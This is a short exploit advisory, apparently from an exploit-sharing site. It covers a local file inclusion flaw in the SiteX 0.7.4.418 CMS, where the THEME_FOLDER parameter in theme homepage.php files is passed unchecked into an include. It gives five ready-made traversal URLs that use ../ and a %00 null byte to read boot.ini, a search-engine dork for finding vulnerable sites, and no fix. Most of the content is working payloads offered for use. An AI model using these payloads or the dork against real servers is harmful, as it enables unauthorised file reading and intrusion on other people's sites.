SiteX <= 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities

2009-05-27 19:03:40

=-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script:SiteX_074_build_418.zip
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://sourceforge.net/project/showfiles.php?group_id=121558&package_id=290027

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vul:/themes/themes_folders/homepage.php
<?PHP
include("themes/$THEME_FOLDER/header.php"); line 2
--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
xpl:
path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Fusion/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Joombo/homepage.ph?THEME_FOLDER=../../../boot.ini%00
path/themes/Streamline/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Structure/homepage.php?THEME_FOLDER=../../../boot.ini%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
dork:"Powered by SiteX 0.7 Beta"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=

#

Fixes

No fixes

In order to submit a new fix you need to be registered.